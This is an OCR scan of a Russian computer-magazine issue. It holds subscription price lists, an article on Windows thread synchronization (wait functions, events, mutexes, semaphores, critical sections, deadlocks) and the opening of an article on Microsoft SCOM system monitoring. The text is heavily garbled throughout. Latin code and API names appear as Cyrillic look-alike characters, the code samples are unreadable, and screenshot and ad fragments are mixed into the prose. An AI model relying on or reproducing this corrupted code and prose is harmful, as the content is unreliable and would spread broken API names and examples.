13 номеров 1105 руб. 12 номеров 1420 руб. 12 номеров 2016 руб. 12 номеров 1470 руб. 


6 номеров 1260 руб. 
12 номеров 2200 руб. 


6 номеров 1260 руб. 6 номеров 900 руб. 


6 номеров 1300 руб. 
12 номеров 2310 руб. 12 номеров 1720 руб. 


12 номеров 2300 руб. 


ПОЛПИШИСЬ! "-"олА- ГАРАНТИЯ 
= — Редакционная подписка без посредников — это 


гарантия получения важного для Вас журнала и 
экономия до 40% от розничной цены в киоске 
пор. С .ГИ 3-300-200-3-999 


у нии 
- м ——- 
Г | 
.® „ 


побьодани шв 
д——_д_д_дд 


6 номеров 1130 руб. 6 номеров 890 руб. 6 номеров 630 руб. 6 номеров 765 руб. 
12 номеров 2060 руб. 12 номеров 1630 руб. 12 номеров 1130 руб. 12 номеров 1380 руб. 


по полной 


ИИ 
АТТТВа а? 
6 номеров 960 руб. 6 номеров 1300 руб. З номера 630 руб. б номеров 1260 руб. 
12 номеров 1740 руб. 12 номеров 2300 руб. 


6 номеров 1140 руб. 12 номеров 2200 руб. 


(дате/апа 


== == а МЕДИА ДЛЯ ЭНТУЗИАСТОВ 
6 номеров 2205 руб. 6 номеров 2150 руб. 6 номеров 2178 руб. 


12 номеров 3890 руб. 12 номеров 3930 руб. 12 номеров 3960 руб. 


7. 


СОПМС 
<>— 


-. 


рограммерские 
типсы И Триксы: 


секреты многопоточности 


© очень часто в наших статьях мы упоминали о тех или иных особенностях языка С++, касающих- 
ся написания многопоточных приложений. С++ не имеет нативной поддержки работы со множе- 
ством тредов, и поэтому программисту приходится самому заботиться о правильном поведении и 
безопасности своего кода. Для этих целей МЛпдом/$ предоставляет множество средств, о которых 


мы сегодня поговорим. 


С появлением многозадачности, в операционных системах остро 
встал вопрос потокобезопасности и совместного доступа к ресурсам. 
Большинство современных приложений так или иначе используют 
треды в своей работе. Помимо организации обработки банальных 
сообщений \\п4о\/$, которые отправляются элементам графического 
интерфейса (окнам, кнопкам, полям ввода ит.д.], многопоточность 
нужна и в ряде чисто прикладных задач. 

Часто возникают ситуации, когда нам требуется дождаться корректно- 
го завершения запущенного треда, или же обеспечить монопольный 
доступ в единичный момент времени к какой-нибудь глобальной 
переменной. Все эти задачи требуют от программиста решить вопрос 
о межпоточной синхронизации. 

Для большей наглядности можно рассмотреть следующий код: 


Ожидаем завершение потока 
// Запускаем поток 
НАМОЁЕЕ ВиогкегТИгеаа = : :Сгеа%еТигеаа( ... ); 

// Перед окончанием работы надо каким-либо образом сообщить 
рабочему потоку, что пора закачивать 


// Ждем завершения потока 

ОМОВО ам\ма1ЕВези1+{ = : :Ма1{Рог$1п21е063)ес*( 
ЮмогкегТЬгеаа, ТМЕТМТТЕ ); 

1+( аммМа1ЕКези1* != МАТТ_ОВЭЕСТ_0 ) 

| 


// обработка ошибки 


// Хэндл потока можно закрыть 
: : С1о5еНапа1е( ИмогкегТИгеаа ); 


В этом примере мы создаем поток с помощью функции Сгеа{е ТПгеад, а 
затем, перед завершением программы, ожидаем, когда наш поток от- 
работает, чтобы закрыть его описатель. Собственно, вся магия заклю- 
чается тутв АР!-функции \/а(Еог5па(еОБес(. Но об этом чуть ниже. 


яве 

реоЦес!$ 
+ нашем примере мы используем функцию \\акЕог5по(еОБес{ для 
временной приостановки потока, в контексте которого она была 
вызвана. Первый ее параметр — это хендл объекта, изменение со- 
стояния которого мы ожидаем. В приведенном коде мы следим за 
описателем потока, но есть и другие объекты ядра, о которых мы по- 
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говорим чуть позже. Объекты ядра могут находиться в двух состояни- 
ях: нейтральном и сигнальном. Так вотфункция \/Ма{Еогпа(еО ес 
занимается тем, что ждет, когда объект перейдет в сигнальное 
состояние, при этом поток, вызвавший ее, совершенно не расходует 
процессорное время. 

Сколько времени ждать наступления сигнального состояния, АР! 
решаетна основе второго параметра — времени в миллисекундах. В 
случае его истечения функция вернет МАП ИМЕОСЧТ. Ожидать из- 
менения состояния объекта можно бесконечно, для этого нужно пере- 
дать во втором параметре значение |МЕИМИТЕ. Или же можно вообще 
не приостанавливать поток, а просто проверить состояния кернел 
обжекта, сделав интервал ожидания равным нулю. Когда объект 
переходит в сигнальное состояние, функция завершается, возвращая 
значение М/АТ_ОВУЕСТ 0. 

Но из названия \\Ма{Еог5па(е0ес{ должно быть понятно, что это все- 
го лишь частный случай АР!-функции \\Ма{цЕГогМиШр(еОБес{$, которая 
предоставляет гораздо больше возможностей. Давай взглянем наее 
прототип. 


Описание ММакРогМи (т р(е0есЕ$ 

ОмМОВО МТМАРТ Ма1ЕРогМи1{1р1е06]ест$ ( 
__1и ОМОВО пСоипф, 

__1п соп$ф НАМОЁЕ *1рНапа1ез, 

__1п ВООЕ БМа1*А11, 

__1и ОМОВО 4мМ11115есопа$ 


р. 


Основное отличие этой АР!-функции от \\акЕогэтпо(еОБес{ в том, что 
она может ожидать изменения состояния сразу нескольких объектов. 
Описатели этих объектов передаются в массиве в параметре соп= 
НАМОГЕ *фНапа([е5. Количество элементов массива задается с по- 
мощью ОМ/ОКО пСоип\, а ВОО Б\\акКАЦ позволяет приостанавливать 
поток до тех пор, пока все объекты ядра не перейдут в сигнальное 
состояние. 

Возвращаемые значения практически идентичны значениям 
\Ма(цЕогэто(еОБес", стой лишь разницей, что если Б\\/аКАЦ == ЕАЕЪЗЕ, 
то в случае установки одного из объектов в сигнальное состояние мы 
получаем на выходе \/АТ_ОВУЕСТ_0 +оБ]есЁ 1пдех_1п_аггау. То есть, 
если из результата вычесть МАТ _ОВУЕСТ_0, то мы узнаем индекс объ- 
екта в массиве, который перешел в сигнальное состояние. 

Теперь, когда мы поняли, как работают функции \\Ма{ЕГог***, мож- 

но подробнее рассмотреть, чем же таким являются объекты ядра. 
\МацЕогМиир[е0Б]ес($ и иже с ней могут мониторить объекты событий 
(Еуеп{$), мьютексы, семафоры, процессы, потоки, таймеры ожидания, 
консольный ввод и некоторые другие виды объектов. Мьютексы, со- 
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саги яй у 


М5ОН Ыбгагу 

\Игидом= бемлеоргтеги 

Сурат семлсее 

ЗупеНготганой 

ЗупсНгопганоп Регэгепсе 

Зупс/гопаноп РипсНоп$ 

АсдигезАм/оскЕхсмеуа 
АсдигезАмАоск5йагед 
АО95ОТовоипдагубазспр ог 
АООТ еогкуабеТовоцадагубезсйя 
АРСРгос 
Сапсеймана ет тег 
САапдеТитегбмеце Титег 
СовеРпуаеМатезрася 
Сгватавоцпдагубаз строг 
Сгватеемеги 
СгаатеЕмегиЕх 
СгеатамМитех 
СгаатаМитенЕх 
СгеатаРпуа еМатезрасе 
СгаатеЗетарМоге 
СгеафеетармогаЕх 
СгеабеТитегоцеие 
СгаааТипегбиувицяТ итаг 
Сгвафе\анаыеТ итнаг 
Сгаате\манаыеТ итьегЕХ 
баекеВоипа губе строг 
бавесписа ес ой 
Сааб еТипегбивия 
СеееТипегоивиеЕх 
Са!еваТ имело нее иле 


т в - 


АзупеНгопоц$ Гопебоп 
АРСРГОС 

Се оче{арредВезий 
Сиеце/ЦзегАРС 


Сопаной мапаЫе апа ЗВАЛ 
1оск Гпебоп 


АсОигезв\/соскЕХ Сие 
Асцитез ву оск$Нагед 
пита есСоп9 И юп\уагаЫе 
пита ге РА оск 
НВееазез ем оскЕнсм ме 
ве!еазезв\/оскзНагед 
ЗеерСоп0Оюп\Уанаес$ 


ЗеерСопОИюл\агаЫе в \/ 
ТгуАСсОоге АН оСКЕХ СЫ $ ме 


Тгудсоиге А оскЗНагед 


> к ы: О в | ед пегоройе, согпег-ие гаги ВВ И565] аерт ы Г 


о ЗупснгошхаНоп РипсНоп$ 


| 
Тре ГоШомта ГопеНоп$ аге и5е0 т зупсбгогпгабоп, 


безспрбоп 
Ап эррисаИоп-дейпед саШБаск Рпсцоп и5ед эии {Пе ОцецецзегАРС бпспол, 
Вефтемуез 1Ие гезуй$ оГап оуейэрред орегацоп, 


А4495 а изег-тоде азупсАгопои$ ргоседиге сай (АРС) обес! {© {Ле АРС дыеце оЁ Ме зрес!ед геад, 


Вееазе5 а эт геадегЛитиег (ЗАМ) 1осК {Па{ газ асдигей м зРагед тоде. 


ореганоп. 


Зеерз оп Ме зресшей сопаНюп мапаЫе ап9 гееазе$ Ме зресШед |оск а5 ап аРолис ореганоп, 


{Агеад такез омпег5 р ог пе |оск. 


—Аткат = 


безспрбоп 


Асадиге5 а 5Ит гездег/итИег (ЭРА) 1оск м ехсы5ме тоде. 
Асдиге$ а $№т геадег/мтиег С5РААГ) |1оск т эНагед тоде, 
итай2е$ а сопаоп уапаЫе, 

ТШпиае а эт геадег/Лигиег (БАМ) Юск. 


Ре|еа505 3 5Ит геадег/мгиег (ЭР!) 10Ск {Ва уаз асфигед м ехсюяуе тоде. 


Зеерз оп Ме зресед сопд!юп хапаЫе апд гееазе$ {Ме зресйед спуса| зесноп а$ ап атс 


АНетри$ 10 асдуге а т геадегДугиег (БАМ) Юск м ехсмзме тоде. № Ме са! 6 зиссез$ Вл, Ме сапа 


Аетр($ #0 асаыге а мт геадег/ипиег (5Р\/) юсК пл зНагей тоде. 1! Ме са! 15 зыссез А, {Ве сапа 
{Агеад така омпегРр ог {Пе |оск. - 


@\ вид (100%) 


Список функций синхронизации в МОМ 


бытия и семафоры служат специально для целей синхро- 
низации, поэтому на них стоит остановиться подробнее. 


Объектядра Событие 


Событие или е\уеп{ — это самый примитивный объ- 
ектсинхронизации. По сути, это просто флаг, который 
может находиться либо в нейтральном состоянии, либо 
в сигнальном. Создать ивент можно с помощью функции 
СгеаеЕуеп\. 


Описание Сгеа{еЕуеп{ 

НАМОЕЕ МТМАРТ СгеафеЕуеп* ( 

__1п_оре "РЗЕСУКТТУ_АТТВТВУТЕ$ 1рЕмеп А г1Би*ез, 
__1и ВООЁ БМапиа1Везеф , 

__1и ВОО БТп1{1а15${ате, 

__1п_ор* ЕРСТЗТВ 1рМате 


р. 


События имеют возможность автосброса. Для этого надо 
установить параметр ВОО БМапиа(Кезе{ в значение 
ГАЕЪЗЕ. В этом случае при обработке ивента функцией 
\МаКЕог*** объектавтоматически перейдет в нейтральное 
состояние. Если же БМапчца(Кезе{ == ТКЦЕ, то сброс флага 
осуществляется функцией Кез&Еуег{. 

События могут быть именованными и не именованными. В 
первом случае к ивенту можно получить доступ из другого 
процесса, открыв объектс помощью АР! ОрепЕуеп\. Такие 
еуеп{( удобно использовать при межпроцессорной синхро- 
низации. Также событию можно задать начальное состояние 
с помощью параметра ВОО! Ыпща$ае. Если он равен 
ТКУЕ, то объект будет создан сразу в сигнальном состоянии. 
Еуеп($ в связке с \\/аКЕог***-функциями обеспечивает 
простой и удобный способ синхронизации потоков. 


Объектядра Мьютекс 


Мьютекс (ппЩех) очень похож на еуеп{ с автосбросом, но, в 
отличие отпоследнего, он имеет привязку к конкретному 
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потоку. Если мьютекс находится в сигнальном состоянии, 
то считается, что он свободен. Кактолько какой-либотред 
дожидается сигнального состояния пЩех с помощью 
функции \\а{Еог*** 
состояние и считается захваченным этим потоком. 


‚ объект сбрасывается в нейтральное 


В отличие от события, мьютекс имеет разные состояния 
для разных тредов. Так, для потока, который захватил 
п\Щех, он выглядит как свободный, и все последующие 


вызовы \М/ацЕГог*** 


вернут результат, говорящий отом, что 
объектнаходится в сигнальном состоянии. Все же другие 
потоки будут видеть его как захваченный объект, то есть в 
нейтральном состоянии и \\"аКЕог*** АР! будут ждать, пока 
он освободится. 

Перевести мьютекс обратно в сигнальное состояние мож- 
но спомощью функции КееазеМщех. Крометого пщех 
имеет счетчик ссылок. Это означает, что КееазеМщех 
надо вызывать столько же раз, сколько были вызваны 
М/акЕог***. 

Если понимание того, чем мьютекс отличается от события 
до сих пор не пришло, то советую взглянуть на пример 
ниже. 


Пример работы Мщех 
НАМОЕЕ ПМитех; 


[НТТР-//ММ/МГ 


\о1а Рипс() 


{ 
: Ма1еЕог$1п21е063ес®(НМифех, ТМЕТМТТЕ); › ИпК5 
КИр://чоо.д/Н2 Ма 
: : Ке1еазеМижех ( ПМитех); — все, что вы хотели 
} знать о синхрониза- 


ции в пд о\/$, но 
ОМОВО ИТМАРТ {Вгеаа1 (ЕР\УОТО рагамт) боялись спросить. 


у 
: : Ма1Рог51п=1е063ес* (ИМифех, ТМЕТМТТЕ); 


Рийс(); 
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ЗИ рИчия ВО У$т9д 5етарйоге ОБ]ес{$ 
М5ОМ Шбгагу 
Млпдо\$ беуеюртеги 
буфет 5еглса$ 
`Зупсйгогеаной 
Она Зупспгогигайой 
Изта Зетарйоге ОБ]есЁ$ 


сгез{е {Ие Игеа($, 


Соттипйу Сотен 
АЗ соде затрИез апд {рз 1ю мата Шгеай 10 регРогт {Ие Так. 
епйапсе {95 1орс. 


ис аые сузидоме И» 
НаисТае село.» 


#4еЁ1пе НАХ БЕН СОШНТ 10 
#4еЁ1пе ТНЕЕАОСОПНТ 12 


НАНОГЕ чибеварноге: 
ОМОЕО УТНАРТ ТАгезаРгос( ГРУОТЬ ): 


Моге... 


11 мази( уса } 


НАНОГЕ аТАгеаЯ [ ТНВЕАОСОПНТ ]; 
ОУОЕО Титеза ТО: 
та 1: 


айбевариоге = Сгеафебенарйоге( 
МИЛ. 


и. 
НАХ_5ЕН СОЦИТ, 
НАХ_5ЕН СООТ. 
ИТТ. 


ши 


Пример использования семафоров 


: : Ке1еахеМижех (ПМи*ех); 


} 

ОМОКО МТМАРТ {Пгеаа2 (1Р\УОТО рагат) 

{ 
: : Ма1Рог51п#1е06)ес* (ПМифех, ТМЕТМТТЕ); 
: : Ке1еазеМи\ех (ИМи*фех); 

} 


1п ма1т(...) 


{ 
ЮМифех = : : Сгеафемиех (МИГ, РАШЗЕ, МЕ); 


НАМОЕЕ ИТЬгеад1 = : :СгеафеТИгеаа (МУТЕ, 0, +Пгеаа1, ...); 
НАМОЕЕ ИТЬгеада2 = : :СгеафеТИгеаа (МУТЕ, 0, +Пгеаа2, ...); 


В этом коде поток {Пгеаа1 дважды вызывает \\Ма(Еог5тпо{еОес{ для 
нашего мьютекса. Причем вызовы эти вложены другв друга, то есть 
сначала два раза вызывается \\а(Гог5ипа(е0Б]ес\т, а затем — два раза 
КееазеМщех. 


Оба вызова проходят \\Ма{Гог*** 


проходят гладко, так как для {Вгеаа1 
наш мьютекс находится в сигнальном состоянии, несмотря на авто- 
сброс. Но этот автосброс влияетна {Пгеа42, который ожидает, пока 
объект станет свободным. 

Если бы мы использовали ивенты, то вызов \\а(Еог5па(еОБес в 
функции Гипс в первом потоке привел бы кего полному зависанию, 
но благодаря свойству мьютекса привязываться к контексту потока, 


этого не произошло. 


Объектядра Семафор (5етарпоге) 


Поведение семафора сложнее, чему других объектов синхрони- 
зации. Несмотря на то, что у него нет привязки к контексту потока, 
каку мьютекса, но зато зетарПоге обладает внутренним счетчи- 
ком. Каждый раз, когда \\Ма{Еог***-функция определяет семафор в 
сигнальном состоянии, этот счетчик уменьшается на единицу. Как 
только счетчик достигнет нуля, семафор переходит в нейтральное 
состояние. Создать зетарпоге можно с помощью АР|!-функции 
Сгеа{е5етарпоге. 
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Тре Помпа эхатре изез а эетарйоге обес! $0 мии Че питьег ог Шгеай$ {Па сап регогт а рагисыаг 1а5К, Риз, ( изе$ {Ие 
Сгевае$етарНоге МопсНой +0 сгвае Не затарйоге апд +0 зрес Ну миа! ап тахииит соцпез, {Вей И у5е$ {Ве СгеафеТИгеаЯ Ролевой №0 


ВеГоге а {Игеад аЦетри$ 10 регогт Ие фа5К, К изе$ {Пе \!айРог5тоеоесе исНоп 40 дефегтиле уПе{Иег {Пе зетарНоге"$ сигиейе соуги 
регти$ № +0 90 50. ТАе мак МлпсНог'5 уте-оси{ рагате*ег 1$ 52% {10 гего, $0 \Ие ГапеНоп геблилз питебтатеу И {Ве зетарйоге 15 п {Ве 
попдпа!ед з{а{е. Майгог5тоеоьвесЕ десгетеп($ {Ие зетарпоге!$ соипЕ Бу опе. 


МПеп а {Игеад сотре{е$ {Пе {а5К, К изе$ 11е ВееазеЗетарпоге псбоп {0 пстетепи( {Не зетарКоге'$ соии", {Вуз епаБпо апо{ег 


„„ Сгвафе а зеварпоге ч1В 1114181 ап пах социёз оЁ МАХ ЗЕМ СООНТ 


хх’ деаа1е весмгтеу аееттЬея 
г’ ииеа| сом 
„’ паклица соци 


„АТИ 


Описание Сгеа{е5етарпоге 

НАМОЕЕ МТМАРТ Сгеа%*е5$етарвоге ( 

__1п_ор* ЕРЗЕСУВТТУ _АТТВТВОТЕ$ 1р5етарпогед{+г16и*ез , 
__1и ЕО№ 1Тп11а1Соип*, 

__1и ЕО№ 1МахттитмСоиий* , 

__1п_ор* ЕРСТЗУТК 1рМате 


у: 


Как видно из прототипа функции, здесь можно задать макси- 
мальное число счетчика (параметр (ОМС (МахититСоип® и 
сразу инициализировать этот счетчик некоторым числом (ОМС 
Ипа(Соип@. Вееазе5етарвоге может увеличить этот счетчик, 
причем не обязательно наединицу, а на необходимое заданное 
значение. 

Объектсемафор может использоваться для ограничения числаак- 
тивных потоков в приложении или для других более сложных задач. 


Критические секции 


Еще одним синхронизационным примитивом являются сгса| 
5есйоп. Для работы с ними есть свой набор АР|, и их нельзя ис- 
пользовать в функциях ожидания \\а{Гог***. По своим свойствам 
критические секции очень похожи на мьютексы — в их случае тоже 
отсутствует угроза взаимоблокировки в контексте одного потока. 
Перед использованием сг@са( есйоп следует сначала ее инициали- 
зировать. Для этого потребуется АР!-функция пща|теСгисаФесйоп. 
Единственный параметр, который она принимает — это указатель 

на объекттипа СВИИСАЕ_$ЕСТ!ОМ [память под этот объект следует 
выделить заранее). 

После инициализации с критической секцией можно работать. 
Функция Е\егСтса[5есНоп переводит объект СКПИСАЕ_ЗЕСТОМ в 
состояние «занято», после чего ни один другой поток не сможет вы- 
полнить код критической секции. [еауеСтса(5есйоп освобождает 
объект. 

Обе АР! в качестве параметра принимаютлишьуказатель на ини- 
циализированный объект секции, нельзя задать ни время ожидания, 
ни других дополнительных опций. То есть, функционально, крити- 
ческая секция является урезанным клоном мьютекса, но в отличие 
от последнего, работа с ней происходит почти в 100 раз быстрее. Мы 
теряем в гибкости, зато прибавляем в скорости. 

Кстати, насчет времени ожидания функцией Е{егСгиса[есНоп 

я немного соврал. Задать его можно, но только для всех кри- 
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> сазтиим ИГ - Мкгозой Увиа! С++ [4езеп] - УРНМопИог.с рр 

Бе 6% Мен Рорф ВЫ еБор Тов  Мибои Нар ний 
ы-1-=ы@ зъе . - Я-Щ 
[8 Ч В ле ЕЕ Е АУЧЯ. 


ЕЫ хо пеонымюю. В | РедныЮ9-срр | Сайгги.срр | СазильВ | Сефер Мгьюег серр | болмйл. В | Ирдавемалаоег.ерр | НРА ныд.срр | НИРО омигасцыЯ. В | мВ Урмопйог.срр | чрх | Зою Ехрюгет = свяпенлигит 9 Ж 


= СаЕСЬ (СУРМИапЕхсеретов тех) 
| 


= 9189 


ь Пемазе - 0 Зачие - мах 3 -. 


ёх->-ЕЕЕОЕВНеЕроее ||; 
ех->2=1Есе[]: 


\019 СУРЫМонтсое: СееасеУриЕуенесв |) снЕсы [СУРНМапЕхсерс10н* 


ш_Еуепс8[3Е УРНЫ МО ТАР] = СеевсеЕуейс (МОЪЬ, РАБЗЕ, РАБЗЕ, "УРНЫ по сар"): 

№ Еуепсв [ЗЕ УРН ЕКРОЙ ЕХТТ] = СгеасеЕуенс (НОБ., РАБЗЕ, РАБЗЕ, "УРНЫ естог ех1") ; 
ш Еуепса[3Е УРМ ЭТОР] = сЕевсеЕуейс (МУЬЬ, РАБЗЕ, РАБЗЕ, “ЭНУРНЫЗтор") ; 
ш_Еуепе8[3Е_ УРН_АОТН РАТЬ] = СгеасеЕуепс (МОБЬ, РАБЗЕ, РАБЗЕ, "УРНЫ аисв ФаЁ!"): р 


ш_Еуепс= [ЗЕ УРНЫ _НАМОЬЕ] = МУЬЬ; 


ое [816 с1*0;: 1+ < ЕУМЕМТ СООМТ - 1: 4++ 


1 
106 ТО РТЫЕ(_Т("%з\ сСееасеУрпЕуенса ()\ 5"), _ РЕ); 
ш_Еуепс8[3Е УРНЫ ЭТАВКТ] = СгеасеЕуейс (МОБЬ, РАШЫЕ, РАБЗЕ, "5НУРНЫЗЕаЕС"): 
} 
=] 


\01а СУРЫНол1соЕ: :СЕеасезунсЕуетсе |) слЕеоы [СУРЫИвиЕхсерс10т*) 


106 ТО РШЫЕ|_Т("\з\ сСееасезунсЕуенс ()\5"), _ ТРТЬЕ ); 


ш ВЗуссЕуенс = СевасеЕуенс [МОЪЬ, РАБЗЕ, РАБЗЕ, МОЬЬ) 1 


1: (а ВБУПСЕМеле] 
* 


РЕ = мы 
Реаду = 


Работа с ивентами в реальном проекте 


тических секций сразу и только в реестре (ключ НКЕУ_ [ОСА _ 
МАСНИМЕ\5У5ТЕМ\Сиггег(Соп{го[5е\Соп{го[\5ез<!оп Мападег\ 
Сгса(бесНопТитеоц®. По истечении этого времени МИМАР! генери- 
руетисключение ЕХСЕР ПОМ_РОЗЗВЕЕ_ОЕАОГОСК, которое вполне 
может означать, что в приложении случилась взаимоблокировка 
потоков — деаоск. Но об этом чуть позже, пока скажу только, что не 
стоит эти исключения заворачивать в пиЦ. 

Помимо ЕщегСгиса(ЗесНоп естьеще ТгуЕг{егСг@са$есйоп, которая 
неожидает освобождения объекта критической секции, а просто 
возвращает ГАЕЗЕ, если потоку не удалось войти в сг@са| зесЙоп. 
Если все нормально, и объект захвачен, то функция вернет ТКОЕ. И 
не забываем удалять объекты секций, когда они больше не нужны, с 
помощью Ое(&{еСгисаесйоп. 


Атомарные операции 


Атомарные операции — это еще один вид синхронизации в многопо- 
точных приложениях. Но их главное отличие от всего прочего заклю- 
чается в том, что они выполняютлишь простые действия. Для каждой 
атомарной операции есть своя АР!-функция. Все эти АР! начинаются 
со слова [г(епоскеч, и количество их потрясает воображение :). 
Например, можно атомарно увеличить или уменьшить наединицу 
какую-либо переменную. Это будет полезно для реализации счетчика 
ссылок в мультипоточных приложениях. 

Скорость выполнения атомарных операций выше, чему критической 
секции. Дело втом, что все эти команды поддерживаются на уровне 
процессора, то есть компилятор генерируетединственную команду в 
машинном коде, которая выполняется СРУ в один заход. 


Оеаоск 


Вернемся к дедлокам. Для того чтобы лучше понять суть этого 
явления, рассмотрим небольшой пример. 


Тутвозможен деаЧюосКк 
ОМОВО ИТМАРТ {Вгеаа1 (1Р\УОТО рагат) 


{ 
: : Иа1{Рог51п#1е063ес*(ИЕуеп А, ТМЕТМТТЕ); 
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ш_Еуепс=[3Е УРН РТС ЕРКОЙ ВЕЗТАРТ] = СхеасеЕуейс (НОБЬ, РАБЗЕ, РАБЗЕ, "УРН_ р1па_ есгог гезсасс"); 
юм _Еуепсв[5Е УРН_РТМС ЕРАОЙ ЕХТТ] = СееасеЕуейс (НО, РАЬЗЕ, РАБЗЕ, "УРН_р1иу_есгог_ех1с"); 


1 (п Еуепсз[1] == МИ) свеом пем СУРЫНапЕхсерстой (_Т("мопЕуепс“) ) 


ГСУРММогиког — УССобеСавя -| 

т мух 

ЕЕ++ - 
(мате) 


СУРНМаПА сх 


, | (51 Ргорегьез | © сулатк нар | 


1 с 1 [15 


: : Иа1{Рог51п#1е063ес*(ПЕуеп В, ТМЕТМТТЕ); 


} 
ОМОВО ИТМАРТ {Игеаа2 (1Р\УОТО рагат) 
{ 
: : Иа1{Рог51п#1е063ес*(ПЕуеп В, ТМЕТМТТЕ); 
: Ма1Рог51п=1е063ес*(НЕуепфА, ТМЕТМТТЕ); 
} 


У нас есть два потока, которые поочередно ожидаютдва ивента: Аи В. 
Возможнатакая ситуация, при которой первый поток захватит событие 
Аи будетожидать освобождения события В, а второй поток, наоборот, 
захватит еуеп{ В и будет ждать А. В этом случае мы получим взаимобло- 
кировку, которая приведет к полному зависанию этих двух тредов. 

Для того чтобы этого избежать, следуетлибо использовать 
\М/ацРогМи !:р(е0Б]ес($ с параметром Б\/акКАЦ, равным ТКЧУЕ, либо 
ожидать события А и В в жестко оговоренным порядке. И то и другое 
достаточно сложно сделать в больших системах. Плюс дедлокам под- 
вержены и критические секции, где мы не можем переложить заботу 
о них на плечи ОС, используя \\Ма{ЕогМир(еОБ]ес{5. 

Для решения этой проблемы используются разнообразные паттерны 
проектирования, которые помогают избежать таких неприятностей 
даже в самых запутанных ситуациях. Но, к сожалению, рассказ о 
таких приемах требует отдельной статьи, поэтому здесья ограничусь 
предупреждением насчеттого, чего стоит опасаться при работе с 
объектами синхронизации. 


Заключение 


Все, что было описано выше, — лишь верхушка айсберга. В рамках 
одной статьи нельзя полностью раскрыть тему синхронизации по- 
токов и совместного доступа к ресурсам. Тем не менее, все, что мы 
рассмотрели в этой статье, вполне может составить хорошую основу 
для правильного написания многопоточных приложений, а конкрет- 
ные нюансы — они ведь все равно познаются на практике. == 
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Ш Ш Сергей «дгтаег» Яремчук [9гтдег@{их. т.ча] 


Сетевой эскулап 


СОМ: решение для мониторинга и диагностики 


систем 


Управление большим количеством разнородных систем никогда не было, да и не могло быть про- 
стым. Ведь в процессе работы необходимо отслеживать десятки параметров, вовремя диагностируя (и 
предотвращая) проблемы. Вручную это сложно, а написать соответствующие скрипты могут лишь са- 
мые опытные админы. Впрочем, эти скрипты будут лишены визуального представления, так понятного 


начальству. 


Назначение и архитектура > СОМ 


Для управления сложными ИТ-инфраструктурами М!сгозоН 
предлагает целый ряд продуктов Зу$ет Сещег, позволяющих 
упростить множество рутинных задач администрирования, по- 
высив эффективность работы сисадмина. Продукт СОМ 2007 К? 
[ОрзМог, бу${ет Сег(егОрегайоп$ Мападег 2007 К2] появился как 
дальнейшее развитие МОМ 2005 (М!сгозо_ ОрегаНоп$ Мападег). В 
его задачи входит собирать все журналы в одном месте, управлять 
и мониторить ОС, сервисы и приложения в гетерогенной среде 
МЛпаом/5, пихи ЧМ. Преимущество 5СОМ — представление 
информации обо всех отслеживаемых компонентах в единой 
консоли, что дает возможность лучше контролировать происходя- 
щие процессы. Все данные связываются в логическую цепочку, то 
есть, если, например, вышел из строя 59 -сервер, администратор 
получит уведомления о том, что все взаимосвязанные приложения 
перестанут работать. 

Для мониторинга используется несколько средств. Сбор данных о 
конфигурации систем и текущем состоянии осуществляют установ- 
ленные агенты [служба управления бу${ет Сег(ег], отправляющие 
все собранное на сервер управления (Мападетеп! Зегуег). В 
случае возникновения проблем агент не только генерирует пред- 
упреждение, но и может выполнить заранее предусмотренные 
действия для ее устранения. Возможен мониторинг без агентов, 
когда 5СОМ в том числе перехватывает сообщения, отправленные 
службой «Доктор Ватсон». При этом данные [при помощи КРС] 
сервером управления будут собираться непосредственно или при 
помощи одного из компьютеров с установленным агентом-прокси. 
Учитывая, что такой подход более ресурсоемкий, рекомендуется 
мониторить не более 10 безагентных систем на один сервер управ- 
ления и 60 — на группу. В разветвленной сети обычно разворачи- 
вают несколько серверов управления, один из них (обычно первый 
установленный] является корневым. Вся собранная информация 
сохраняется в нескольких базах М5 5@1 Зегуег — оперативная [до 
7 дней] и долгосрочная [Ра{ам/агероизе, 1 год). 

Все элементы объединяются в группу управления [Мападетепи 
Сгоцр), которая представляет собой логически обособленную 
единицу со своими настройками, некое подобие могкдгочр в сети 
\Мпаом/5. В большой сети для удобства и безопасности можно ис- 
пользовать несколько МС, причем агент может отправлять данные 
четырем группам. 

В разветвленных сетях для связи с сервером ОрзМог используют 
шлюз Ор$Мог который, являясь единой точкой доступа [прокси}, 
отвечает за аутентификацию агентов. 

Управление производится при помощи графической консоли, веб- 
интерфейса или командной строки Ро\миег5ПеЦ. В интернете можно 
найти десятки готовых Р5-скриптов практически под любые за- 


дачи администрирования. Например, большая коллекция собрана 
на портале буз{ет Сег(ег Сепига| [зуз{еппсеп{егсепга(.согп). 
Количество систем, ресурсов и приложений может быть большое, 
вручную набирать правила мониторинга для такого числа — за- 
дача напряжная. В 5СОМ для этой цели используются пакеты 
управления (Мападетеп: РасК$], которые и содержат все не- 
обходимое. Го сути, внутри описание приложения, его структура, 
связи с другими приложениями и мониторы [состояние], задачи 
на восстановление и так далее. Их наличие упрощает настройку 

и дальнейшее диагностирование. Собственно МР и являются 
основной фишкой СОМ, определяющей его функциональность. 
Часть таких пакетов разрабатывается самой МЪ. Причем после 
выхода нового продукта от М5, чуть позже объявляется о по- 
явлении соответствующего пакета. Так, например, СОМ стал 
поддерживать М5 Гогегоп{ ТМС, Зу$ет Сещег Вафа РгоесИоп 
Мападег 2010 и другие. Кроме этого любая сторонняя компания 
или комьюнити может добавить пакет для мониторинга нужного 
приложения. Необходимые ссылки для закачки дополнительных 
Мападетеп{ Раск$ можно найти на домашней странице $СОМ 
или сторонних ресурсах [вроде того же эуз{етпсеп(егсеп(га(. сот). 
При желании легко самому написать пакет, осуществляющий сбор 
данных по 5ММР и конвертирование в формат, понятный СОМ. 
Если интересует, на ТеспМе{ доступно подробное описание. Сами 
пакеты могут быть двоичного формата или в виде ХМ! -файла. 
Параметры первого изменить напрямую нельзя, для этого исполь- 
зуются переопределения. В ХМЕ можно вносить изменения как 
непосредственно, так и скопировав его, с другим именем. 

Также 5СОМ строит графики загруженности и позволяет модели- 
ровать возникновение проблем. Сервер отчетности (РерогИпд 
бегуег], устанавливаемый как дополнительный компонент, предо- 
ставляет широкий функционал в построении различных отчетов. 
Кроме этого при развертывании Ор$Мог доступен инструмент — 
Ацай СоЦесНоп бегмсез [АС$}, позволяющий хранить и анализиро- 
вать логи событий безопасности. 

В ЪСОМ реализована гибкая система ролей, в которой пользо- 
ватели получаютлишь действительно необходимые права на 
управление или получение данных. В настоящее время актуаль- 
ной является версия 5СОМ 2007 К2, в которой улучшен интерфейс, 
процедура импорта модулей, используются новые шаблоны, 
встроена поддержка ипих/Угих и многое другое. 


Установка 5СОМ 


Процедуру я бы не назвал сверхсложной, но учитывая многочис- 
